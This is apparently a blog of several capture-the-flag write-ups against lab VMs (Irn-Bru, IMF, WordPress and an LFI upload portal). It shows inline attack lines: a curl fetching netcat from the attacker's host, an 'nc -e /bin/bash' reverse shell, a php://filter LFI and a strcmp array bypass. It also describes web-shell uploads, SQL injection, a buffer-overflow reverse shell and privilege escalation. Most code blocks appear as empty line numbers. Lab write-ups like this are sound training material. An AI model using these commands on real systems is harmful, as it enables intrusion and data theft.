How did Ah get in this spiral? Ah had a box to hack..ye know what would help me focus? It starts with Irn and ends with Bru!
The /flicks/ directory gives a 403 Forbidden error, but also discloses the web server version, which is Apache/2.4.18 (Ubuntu) Server
The /telly/ directory also has a picture and 2 videos, along with more hints:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 |
|
In case ye forgot about Irn-Bru, here’s a reminder:
A.G. BARR p.l.c., commonly known as Barr’s, is a Scottish soft drink manufacturer, based in Cumbernauld, Scotland. It manufactures the popular Scottish drink, Irn-Bru
Back to the challenge…but it would be easier if Ah had some Irn-Bru! At this point, the only actionable hint Ah could understand was the one about phpinfo. There is no third video on the page, so Ah just tried navigating to http://192.168.145.131/flicks/phpinfo.php, which didn’t work. Following on the hint about .pht extensions, Ah changed it to http://192.168.145.131/flicks/phpinfo.pht and got a blank page instead.
After some Googling and drooling over Irn-Bru, Ah found a blog post about PHP Backdoors: Hidden With Clever Use of Extract Function. It explains about a seemingly innocuous backdoor with the code:
1 2 |
|
The extract() function imports variables into the local symbol table from an array.
This function uses array keys as variable names and values as variable values. For each element it will create a variable in the current symbol table.
The blog post is a very interesting read, and the applicable item is that the code is extracting content sent via GET/POST requests and creating variables that are then executed with the format execute ctime with atime as argument
Following the example, running http://192.168.145.131/flicks/phpinfo.pht?ctime=system&atime=whoami returns www-data, so we have achieved command execution! Time for an Irn-Bru break…
Doing very light enumeration, Ah found out that netcat is available on the target, so Ah fired up a listener and tried using netcat to serve a shell on my listener, but it didn’t work. So Ah used Python’s SimpleHTTPServer to transfer my netcat to the target system. Note that ye have to use URL encoding: http://192.168.145.131/flicks/phpinfo.pht?ctime=system&atime=curl%20http%3A%2F%2F192.168.145.129%2Fnc%20--output%20nc
The binary was downloaded to /var/www/html/flicks
. Ah made it executable and ran it, but nothing happened. Next, Ah moved it to /tmp and ran it from there with 192.168.145.131/flicks/phpinfo.pht?ctime=system&atime=%2Ftmp%2Fnc%20192.168.145.129%208080%20-e%20%2Fbin%2Fbash
and it worked:
1 2 3 4 5 |
|
We have a reverse shell, but it’s very limited. The usual Python shell spawning didn’t work, because on the box there’s actually Python 3. Which only changes things slightly: python3 -c “import pty; pty.spawn(‘/bin/bash’);”
1 2 3 4 |
|
Inside cpgrogan there’s a kochanski directory that we’re not permitted to view. In jkerr’s home there’s an empty .sudo_as_admin_successful file, but we find a hint about jkerr’s password:
1 2 3 4 5 6 7 8 9 10 |
|
And inside proclaimers there are 2 directories. We can’t enter 500miles, but inside letterfromamerica there are 2 interesting files belonging to root:
1 2 3 4 5 6 7 |
|
Inside test there is some kind of message, stating that “So Claire was right about those wildcards”, and semaphore is an executable. Running it gives a shell under the same user account. Probably need more information (or Irn-Bru) before exploiting this.
Back to the next step, did a su to jkerr and used breakfastclub as a password and it worked! Ah used Python to transfer the images to my machine and broke my shell in the process:
1 2 3 4 5 6 7 8 9 10 11 12 |
|
An Irn-Bru would have prevented that mistake! After redoing the steps, Ah ran exiftool on the downloaded images and found a base64 encoded string in promisedyeamiracle.jpg:
1
|
|
Decoded, it means gemini. Ah didn’t know what to do with this, so Ah googled for the other user accounts.
cpgrogan:
Claire Patricia Grogan (born 17 March 1962), known professionally as Clare Grogan or sometimes as C. P. Grogan, is a Scottish actress and singer. She is best known as the lead singer of the 1980s new wave music group Altered Images and for supporting roles in the 1981 film Gregory’s Girl and the science fiction sitcom Red Dwarf as the first incarnation of Kristine Kochansk
proclaimers:
The Proclaimers are a Scottish music duo composed of twin brothers Charlie and Craig Reid (born 5 March 1962). They are best known for their songs “I’m Gonna Be (500 Miles)”, “Sunshine on Leith”, “I’m On My Way” and “Letter from America”, and their singing style with a Scottish accent
Well, we don’t need an Irn-Bru to connect the dots, gemini, twins! That is actually the password for the proclaimers account. Now to get back to the folders from before:
1 2 3 4 5 6 7 8 9 10 |
|
Ah downloaded the images in case of need and out of curiosity. Then it was back to the semaphore. Ah grepped for files containing the word semaphore, and tried avoiding being flooded by irrelevant results like libraries. Eventually, Ah got a hit under /usr/local, in the /usr/local/bin/numpties.sh
file:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 |
|
Back to the dictionaries it is, and memory alert, Ah remembered being called a numpty once!
numpty – A person who is incapable of performing the simplest of task correctly. Usual symptoms include poor hand-eye coordination, zero common sense and the general illusion that they are special (caused by parents referring to them as such and the numpty not fully grasping the meaning implied).
Common causes are being dropped as a baby or repeated heavy blows to head in later life.
dobber – A Glasgow term for a dick head or in general just a stupid cunt.
Now for the code, attempts to put PHP shells on the server fail because the shells get deleted. Also, a couple of file transfer utilities have been removed (the reason why Ah resorted to curl). It looks like this might be used in a cronjob. Finally, if the semaphore file exists, its owner is changed to root and the SUID bit is set. Which means, we can create a semaphore file that would allow us to become root if it were SUID.
On my box, Ah compiled an executable (no GCC on the target) with the following C code:
1 2 3 4 5 6 7 |
|
Ah made it executable for everyone and transfered it to the target, again with curl:
1 2 3 4 |
|
Waited a while, thought about some Irn-Bru, came back and got root!
1 2 |
|
Finding the flag is usually the last step, but not on knightmare’s machines!
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 |
|
Ah transfered the flag.jpg to my machine with netcat, but no metadata that could help. The text file is not the right one, obviously:
1 2 3 4 5 |
|
Looking around further:
1 2 3 4 5 |
|
The directory tree goes…on..and on…Ah used a Python script to solve this annoyance:
1 2 3 4 5 6 7 8 |
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 |
|
Inside this madness there’s a 12M archive. Ah moved it to a sane location, transfered it to my machine, and attempted to extract it, but it was password protected. No need for cracking, guessing from all the options, the password is Teuchter:
1 2 3 4 |
|
A VMDK disk. There’s actually a hint for this inside root’s crontab entries:
1 2 |
|
Let’s see what the package does:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 |
|
Ah installed the package, and then hit a standstill on how to actually mount the virtual disk. After trying several approaches and failing, what worked was attaching the VMDK to my Kali virtual machine from the host. Ah had to change the compatibility of my VM for that to work, but it could possibly also work by editing the VMDK and changing ddb.virtualHWVersion to a version matching the VM’s compatibility, but Ah haven’t tried that. After doing it like that, Ah was able to see the disk under /dev/sdb1:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 |
|
Now Ah could mount it and see what’s inside:
1 2 3 |
|
The hint mentions a password made of 25 characters that we should be able to find from what we’ve been through:
1 2 3 4 |
|
In the redkola (Irn-Bru, anyone?) folder there are more VMDK files, but at least the hint focuses us on the ISO:
1 2 3 |
|
Ah mounted the ISO next:
1 2 3 |
|
All that Irn-Bru! And with something extra, perhaps? Enter steghide!
Steghide is a steganography program that is able to hide data in various kinds of image- and audio-files. The color- respectivly sample-frequencies are not changed thus making the embedding resistant against first-order statistical tests.
Features include the compression of the embedded data, encryption of the embedded data and automatic integrity checking using a checksum. The JPEG, BMP, WAV and AU file formats are supported for use as cover file. There are no restrictions on the format of the secret data.
Steghide can also be used to check for the presence of a secret message and to extract it, if provided the correct passphrase. Putting together all the hints (scotland, girders, irn-bru wiki page) or just watching and listening to the advert gives us the passphrase madeinscotlandfromgirders
1 2 3 4 5 6 7 8 9 10 |
|
Aaand, after much pain, we have the flag!
1 2 3 |
|
Achievement unlocked: Unlimited Irn-Bru!
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 |
|
This challenge cost me 1.5 days of the weekend, but it was funny as feck! And Ah learned a couple slang words that will sure come in handy. AND IRN-BRU!!! Which, in case ye haven’t figured it out, stands for Iron Brew! Cheers, knightmare!
Just gonna leave this here:
And this:
It’s not over:
1 2 3 4 5 6 7 8 9 |
|
The difficulty is Beginner/Moderate
1 2 3 4 |
|
Only port 80 is open, so let’s begin from there.
So we learn that IMF stands for Impossible Mission Force and that it’s a US intelligence agency. 3-letter agencies everywhere!
The Projects page makes for a fun read and it also reveals that the site is using PHP.
The contact page gives us some names and mail addresses:
The first flag can be found as a HTML comment in the source of the contact.php page:
1
|
|
Decoding the base64 flag gives the hint allthefiles
.
I interpreted the hint to mean bruteforce, but I tried with multiple tools and wordlists and didn’t find anything. Going back through the HTML source, I noticed that several of the included Javascript files look like base64:
1 2 3 |
|
Putting them all together gives the string ZmxhZzJ7YVcxbVlXUnRhVzVwYzNSeVlYUnZjZz09fQ==, which yields the second flag when decoded: flag2{aW1mYWRtaW5pc3RyYXRvcg==}. This, in turn, gives the next hint: imfadministrator
With no other services available, everything revolves around the site. Using the above hint in the URL takes us to a hastily-made login page:
And in the source there’s an interesting comment:
1
|
|
Ok, this added an interesting twist that exploits PHP functionality. Since the password is hardcoded, when attempting to log in we’d expect a string comparison to be made between the user input and the hardcoded password value. This is done in PHP through the use of the strcmp() function:
strcmp(string1,string2)
This function returns:
1 2 3 |
|
However, when reading through its manual page, there was a very interesting comment by chris at unix-ninja dot com:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 |
|
If we build on this example, in case the login page was codded with an equals comparison, making the function fail may exhibit the same behavior as if the strings matched. And to do that, we’ll have to compare the hardcoded string with something that is not a string, like an array in this example. I used Burp to intercept the POST request that looks like this:
1
|
|
For the user, I used Roger’s username that we’ve discovered earlier. And then passed the password as an array:
1
|
|
And the login succeeded!
1 2 3 |
|
The decoded flag says continueTOcms
. And that IMF CMS is a link to http://192.168.145.130/imfadministrator/cms.php?pagename=home
The Upload Report page is under construction. The Disavowed list is redacted:
In the URL, observe how the pages are constructed:
1
|
|
I tried inserting a single quote in the pagename parameter and sure enough, a SQL error!
1
|
|
Time for sqlmap!
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 |
|
The output was huge, so here I left only the relevant part:
1 2 3 4 5 6 7 8 9 10 11 |
|
The admin DB contains a table with the pages that we’ve seen in the CMS, but it looks like there’s an extra page we didn’t know about! Let’s see it!
I used an online barcode reader for the QR code which revealed the flag: flag4{dXBsb2Fkcjk0Mi5waHA=}. And the next hint is uploadr942.php
Going to http://192.168.145.130/imfadministrator/uploadr942.php takes us to an upload form:
Attempting to directly upload a PHP shell fails with an invalid file extension message. Then I tried a GIF downloaded from the internet, but another error, that the file is too large. So I just created a makeshift file with the GIF89 magic number and uploaded it with no problems. There was no mention of where ig might be located, but in the source code of the page now appeared a HTML comment:
1
|
|
I tried putting that in the URL with a GIF extension, but that was a no-go. So I fired up dirb to see if there are any other directories under imfadministrator:
1 2 3 4 5 6 |
|
Awesome, it found and uploads directory. This time I appended the previous name to this new path and it found my GIF file. So the next thing was to repeat the process of a previous challenge and try uploading a PHP shell disguised as a GIF image. But today I decided to experiment with a different type of shell.
Homepage: https://github.com/epinna/weevely3
Description
Weevely is a web shell designed for post-exploitation purposes that can be extended over the network at runtime.
Upload weevely PHP agent to a target web server to get remote shell access to it. It has more than 30 modules to assist administrative tasks, maintain access, provide situational awareness, elevate privileges, and spread into the target network.
Features
Shell access to the target
SQL console pivoting on the target
HTTP/HTTPS proxy to browse through the target
Upload and download files
Spawn reverse and direct TCP shells
Audit remote target security
Run Meterpreter payloads
Port scan pivoting on target
Mount the remote filesystem
Bruteforce SQL accounts pivoting on the target
Agent
The agent is a small, polymorphic PHP script hardly detected by AV and the communication protocol is obfuscated within HTTP requests.
First, I installed Weevely on my machine by cloning its git repository and installing the requirements:
1 2 3 |
|
Then I ran the Weevely client:
1 2 3 4 5 6 7 8 9 10 11 12 13 |
|
We need to generate the agent that we’ll actually upload to the target server:
1 2 |
|
I appended the GIF magic number at the beginning and changed the extension to GIF and successfully uploaded the shell. Then I connected to it with the Weevely client:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 |
|
Now let’s use it to poke around:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 |
|
Listing the files in the current directory gives us the fifth flag!
1 2 3 4 5 6 7 8 9 10 11 12 |
|
The decoded hint is agentservices
I ran a search on the filesystem for files with agent in their name and got 2 hits:
1 2 3 |
|
Interestingly, it seems there is an agent server around:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 |
|
So it seems the agent service is listening on port 7788 and running as root:
1 2 3 4 |
|
Next I went to /usr/local/bin
where the executable is located:
1 2 3 4 5 6 7 8 |
|
We need to give it a valid agent ID for authentication. Inside the folder there is also another file:
1 2 |
|
Looks like a port knocking sequence. I borrowed from an example on ArchLinux wiki
1
|
|
And when I ran Nmap again, I found port 7788 is now open to the public:
1 2 |
|
Connecting to it takes us to the agent prompt where we have to put the agent ID. I downloaded the agent executable on my system for GDB:
1
|
|
Running strings on it also gives some interesting infomation about extraction points. Anyway, back to the agent ID. In the strings I saw a call to strncmp, so when running the executable I set up a breakpoint on main, then ran the program, set a breakpoint to strncmp and gave it some input. Doing so, I noticed what appears to be a hardcoded value in the comparison:
1 2 3 4 5 6 7 8 |
|
I used 48093572 as the agent ID and it worked and took me to a menu:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 |
|
Interesting. The 3rd option is the one that appears to take a variable amount of input, so maybe there’s a buffer overflow lurking around. It’s been a while since I’ve done any binary exploitation. First thing, creating the pattern that might crash the service:
1 2 |
|
I used the above string for the report and the program did crash:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 |
|
With my binary exploitation skills unused in a long time, I had to revisit some topics and also take a look at how others solved this. Moving on, a couple of interesting things, EIP gets overwritten by Af6A, which appears at offset 168 of the payload:
1 2 |
|
However, if we look at EAX, we see our pattern from the beginning. Which means that if we had some shellcode instead of the pattern, it would get stored in EAX, and to execute it we would need a JMP or a CALL instruction to EAX. Luckily, there’s one available!
1 2 |
|
Now, for the shellcode part. The way of feeding it to the vulnerable program will be using a Python script. I chose a reverse TCP shell for the payload and avoided badchars like nulls and newlines (line feeds and carriage returns):
1 2 3 4 5 6 7 8 9 10 |
|
The payload size is 95 bytes:
1 2 3 4 5 6 7 8 9 10 |
|
Under these conditions, we would need to send a buffer of the shellcode + padding + the address of the CALL EAX instruction. Let’s see the Python:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 |
|
And what remains is to execute it:
1 2 |
|
And on the listener, mission accomplished!
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 |
|
And the final decoded flag is Gh0stProt0c0ls
! This was a really nice challenge in the later stages, especially from flag 3 onwards! Hats off to Geckom and the collaborators for this interesting VM!
As a recap, from only a web server available to root:
1 2 3 4 5 6 7 8 9 10 11 12 13 |
|
Nmap shows SSH, Samba, a web server and mail services running on the target:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 |
|
On the web server there are some pictures with planets and the message “Hack The Planet”. But there are entries in robots.txt:
1 2 3 4 5 6 7 |
|
No directory called hackers but there is a Wordpress blog :p
Naturally, I ran Wpscan, and it found 2 usernames:
1 2 3 4 5 6 7 8 |
|
A prelimiary check for default credentials actually revealed the password for the admin user is..you will never guess it..admin! For receiving a shell, I wanted to try a new tool: WPForce!
WPForce is a suite of Wordpress Attack tools. Currently this contains 2 scripts – WPForce, which brute forces logins via the API, and Yertle, which uploads shells once admin credentials have been found. Yertle also contains a number of post exploitation modules.
I used the yertle.py
script to upload a backdoor:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 |
|
Time to snoop around! I was able to read /var/www/wordpress/wp-config.php
and inside found credentials for the SQL database:
1 2 3 4 5 |
|
I also found a flag inside wpadmin’s home directory:
1 2 3 |
|
I found the shell I had pretty restrictive so I used Yertle to get a reverse shell that I could upgrade:
1 2 3 4 |
|
And on my listener side:
1 2 3 4 5 |
|
I used Python to spawn a TTY and then I tried the root credentials for a pleasant surprise. They are the actual credentials of the root user!
1 2 |
|
And that was it for this challenge!
1 2 3 4 5 6 7 8 9 10 |
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 |
|
The website is an intranet portal for uploading images, but we have to login first.
I ran Nikto on it but there were no interesting finds, except for the following line:
1
|
|
However, when I tried to read that file, all I got was a blank page. I’ve noticed that the URLs for the pages look like this: http://192.168.164.129/?page=login for the login page and http://192.168.164.129/?page=upload for the upload page. I tried some directory traversal and file inclusion techniques, thinking that this might be the way of reading the config.php file, but had no luck. However, as I was searching for a way on the internet, I came across this article on a LFI method that uses PHP filters. The below command allows reading the source of PHP files by using the filter functionality to base64 encode the contents of the file before reading it:
url?page=php://filter/convert.base64-encode/resource=config
This returned a base64 string that when decoded, gave me the MySQL credentials:
1 2 3 4 5 6 |
|
Now we can connect to that database:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 |
|
Let’s see what we have here:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 |
|
3 users with base64 encoded passwords!
1 2 3 |
|
I logged in as kent and tried uploading a PHP reverse shell, but got an error stating that the file type is not allowed. Using the previous LFI method, let’s take a look at the source code of the upload page:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 |
|
We can see that the file will get uploaded to the /upload folder with an MD5 name and that it has to be an image file of the 4 allowed types, complete with a matching MIME type. To test it, I changed pentestmonkey’s reverse shell extension to .gif and added the magic string at the beginning of the file (GIF98). Then I pushed the upload button and bingo! The shell has been successfully deployed at upload/ff280c52a4fbcbea847ca4a2d69ce6c0.gif
My listener is prepared and all, but there is still the matter of how to execute the shell. For any possible hint, I’ve looked t the source code of the index page:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 |
|
That cookie parameter looks vulnerable if we can include a file of our choosing. I tested it by replaying a request in Burp and using the following LFI for the cookie value:
1
|
|
The response came back with the contents of the passwd file, so it worked! I did the same, this time setting the cookie to the path of the previously uploaded shell:
1
|
|
And in our listener, we have a hit!
1 2 3 4 5 6 7 8 9 |
|
I’ve proceeded to switch through the 3 users for which I got the passwords earlier and see what can be done. Nothing interesting from kent, getting an authentication failure as mike, but in kane’s home folder there’s an interesting SUID binary called msgmike
1
|
|
Trying to run it gives an error:
1 2 3 |
|
Interesting, this calls cat, but not from an absolute path. So if we create a malicious binary called cat and add kane’s home to the PATH variable, we should be able to run an arbitrary program with mike’s privileges.
1 2 3 4 |
|
Here we want to run bash as mike. Let’s see how the PATH looks:
1 2 3 |
|
Now let’s add the current location to the PATH:
1 2 3 4 |
|
Running the binary turns us into mike!
1 2 3 |
|
In mike’s home there is another SUID binary, this time owned by root. We can see where this is going..
1 2 3 4 5 6 |
|
This binary takes an input and outputs it to the screen, while also appending it to a file in root’s home (below line is taken from strings output)
1
|
|
We can chain commands by passing a string for the echo function and then adding a second command with ;
:
1 2 3 4 5 6 |
|
We’re root now! Read the flag and game over:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 |
|
This was a nice challenge with the LFI twist! A new technique added to our repertoire, and another boot2root completed!
1 2 3 4 5 6 7 8 9 10 |
|